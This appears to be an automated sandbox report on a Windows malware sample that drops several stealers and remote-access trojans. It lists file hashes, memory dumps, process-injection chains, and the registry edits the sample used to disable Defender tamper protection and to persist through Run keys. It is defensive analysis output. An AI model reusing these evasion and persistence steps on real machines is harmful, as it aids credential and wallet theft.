memory/2192-200-0x0000000000403BEE-mapping.dmp

memory/1164-197-0x0000000001F20000-0x0000000001F46000-memory.dmp

memory/2220-196-0x0000000000000000-mapping.dmp

memory/2264-202-0x0000000000000000-mapping.dmp

memory/2192-203-0x0000000000400000-0x0000000000408000-memory.dmp

\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/2304-206-0x0000000000400000-0x000000000040C000-memory.dmp

memory/2304-207-0x000000000040616E-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/2304-209-0x0000000000400000-0x000000000040C000-memory.dmp

memory/2376-211-0x0000000000000000-mapping.dmp

memory/2404-213-0x0000000000000000-mapping.dmp

memory/2428-214-0x0000000000000000-mapping.dmp

C:\Windows\temp\qlmkdkl1.inf

MD5 74863fac8e9443d4352018f8a41f999a
SHA1 5af1c9eaaea81ebb081af89faa3b872173e55758
SHA256 31aa06a6d25bb696e68b72f546bf44bd7a3bb40b681ce1cac10bcdaa4d88cc15
SHA512 932ec75b4f71b77173fdcfa884e6557f1cc20ee9e73de824c9d420c76e97473298390ff6c3b183092700709e3d2dffc6007f43b26dc72912d4b6215073f9f51a

C:\Users\Admin\AppData\Local\Temp\tmpF1FD.tmp

MD5 ac9ba09a7d6fa1b7b28bdfccb8891315
SHA1 911e075176c36daeee8ea457939b56385de09fc2
SHA256 e8eaba3b34b3aa0b45fc3258cbfdd20dff2432a2e5c130fc194ac37d619fc5a9
SHA512 67c0247df9fbb06a14bd794513fa9354bf9551eaa8b69926988e74452fed5c46b4c8dd2e6e21a4bcff651b70ee99f3c19605044509a4f98cde4ac75fd17e55b2

\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/2476-220-0x0000000000400000-0x0000000000412000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/2476-221-0x000000000040C71E-mapping.dmp

memory/2476-223-0x0000000000400000-0x0000000000412000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2404-226-0x0000000000D40000-0x0000000000D41000-memory.dmp

memory/2404-227-0x00000000048F0000-0x00000000048F1000-memory.dmp

memory/2404-229-0x00000000048B0000-0x00000000048B1000-memory.dmp

memory/2304-228-0x00000000003C0000-0x00000000003C1000-memory.dmp

memory/2404-230-0x00000000048B2000-0x00000000048B3000-memory.dmp

memory/2404-231-0x0000000002490000-0x0000000002491000-memory.dmp

memory/2404-232-0x0000000004870000-0x0000000004871000-memory.dmp

memory/2404-235-0x0000000005670000-0x0000000005671000-memory.dmp

memory/2404-253-0x000000007EF30000-0x000000007EF31000-memory.dmp

memory/2476-267-0x0000000004D10000-0x0000000004D11000-memory.dmp

memory/2812-268-0x0000000000000000-mapping.dmp

C:\Users\Public\nest.bat

MD5 8ada51400b7915de2124baaf75e3414c
SHA1 1a7b9db12184ab7fd7fce1c383f9670a00adb081
SHA256 45aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7
SHA512 9afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68

memory/2844-270-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/2968-272-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/2968-278-0x00000000002A0000-0x00000000002A1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZJL1OKS0\Ceutdxblshrdzspwhpvvjqjnojgrlfy[1]

MD5 0255607b1e1f1aedb2bcff935b95f31b
SHA1 9fe5206a03f6b4cd76e07930347f50b27d171f35
SHA256 44e63a074b3e2961cabd7809f22cd0d579c52231254b104ec7a18f04964fda00
SHA512 30d4b39d668393dd8b142cd8526a22a25fcb3665d4628f6742df4c1402ef39ab72724a344f9bc2de5022fdc2abc97f4c0a060d42175b443450a88554f61d38d9

memory/1772-289-0x00000000004019E4-mapping.dmp

memory/1160-292-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-08-05 10:31

Reported

2021-08-05 10:33

Platform

win10v20210408

Max time kernel

147s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

Signatures

AsyncRat

rat asyncrat

Azorult

trojan infostealer azorult

BitRAT

trojan bitrat

BitRAT Payload

Description Indicator Process Target
N/A N/A N/A N/A

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Oski

infostealer oski

Raccoon

stealer raccoon

Raccoon Stealer Payload

Description Indicator Process Target
N/A N/A N/A N/A

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18

suricata

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Abthdwq = "C:\\Users\\Public\\Libraries\\qwdhtbA.url" C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ceutdxb = "C:\\Users\\Public\\Libraries\\bxdtueC.url" C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe N/A

Checks installed software on the system

discovery

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 996 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 996 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 996 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 996 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 996 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 996 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3832 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3832 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3832 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3832 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 2712 wrote to memory of 1872 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2712 wrote to memory of 1872 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2712 wrote to memory of 1872 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2712 wrote to memory of 1872 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 996 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 996 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 996 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 996 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 3116 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 3116 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 3116 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 2560 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2560 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2560 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1536 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe
PID 1536 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe
PID 1536 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe
PID 1536 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 1536 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 1536 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 1536 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe
PID 1536 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe
PID 1536 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe
PID 1536 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe
PID 1536 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe
